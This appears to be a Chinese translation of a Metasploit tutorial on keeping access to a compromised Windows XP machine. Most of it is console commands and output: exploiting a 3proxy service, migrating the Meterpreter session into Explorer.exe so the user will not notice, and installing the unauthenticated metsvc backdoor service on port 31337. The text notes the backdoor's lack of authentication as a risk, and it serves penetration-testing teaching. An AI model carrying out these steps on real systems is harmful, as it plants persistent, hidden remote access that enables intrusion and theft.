在经历了exploit系统的所有艰苦工作之后,为自己留下更简单的方法以备后用,通常是一个好主意。这样,如果您最初exploit的服务已关闭或打补丁,您仍然可以访问系统。
要阅读关于metsvc的原始实现,请参阅:http://www.phreedom.org/software/metsvc/
使用metsvc后门,您可以随时获得Meterpreter shell。
在我们进一步探讨之前,有一个警告词:这里显示的metsvc不需要认证。这意味着任何进入港口的人都可以进入后门!如果您正在进行渗透测试,这不是一件好事,因为这可能是一个重大风险。在现实世界的情况下,您可以将源更改为需要身份验证,或者通过其他方法过滤掉与端口的远程连接。
首先,我们利用远程系统并迁移到'Explorer.exe'进程,以防用户发现被利用的服务没有响应并决定终止它。
msf exploit(3proxy) > exploit
[*] Started reverse handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1983)
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
132 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
176 svchost.exe C:\WINDOWS\system32\svchost.exe
440 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
632 Explorer.EXE C:\WINDOWS\Explorer.EXE
796 smss.exe \SystemRoot\System32\smss.exe
836 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
844 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
884 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
908 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
952 services.exe C:\WINDOWS\system32\services.exe
964 lsass.exe C:\WINDOWS\system32\lsass.exe
1120 vmacthlp.exe C:\Program Files\VMware\VMware Tools\vmacthlp.exe
1136 svchost.exe C:\WINDOWS\system32\svchost.exe
1236 svchost.exe C:\WINDOWS\system32\svchost.exe
1560 alg.exe C:\WINDOWS\System32\alg.exe
1568 WZCSLDR2.exe C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
1596 jusched.exe C:\Program Files\Java\jre6\bin\jusched.exe
1656 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
1748 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1928 jqs.exe C:\Program Files\Java\jre6\bin\jqs.exe
2028 snmp.exe C:\WINDOWS\System32\snmp.exe
2840 3proxy.exe C:\3proxy\bin\3proxy.exe
3000 mmc.exe C:\WINDOWS\system32\mmc.exe
meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.
在安装metsvc之前,让我们看看我们可以使用哪些选项。
meterpreter > run metsvc -h
[*]
OPTIONS:
-A 自动启动一个匹配的 multi/handler 以连接到该服务
-h 这个帮助菜单
-r 卸载现有的Meterpreter服务(必须手动删除文件)
meterpreter >
由于我们已经通过Meterpreter会话连接,因此我们不会立即将其设置为连接到我们。我们现在只需安装该服务。
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
[*] * Installing service metsvc
* Starting service
Service metsvc successfully installed.
meterpreter >
该服务现在已安装并正在等待连接。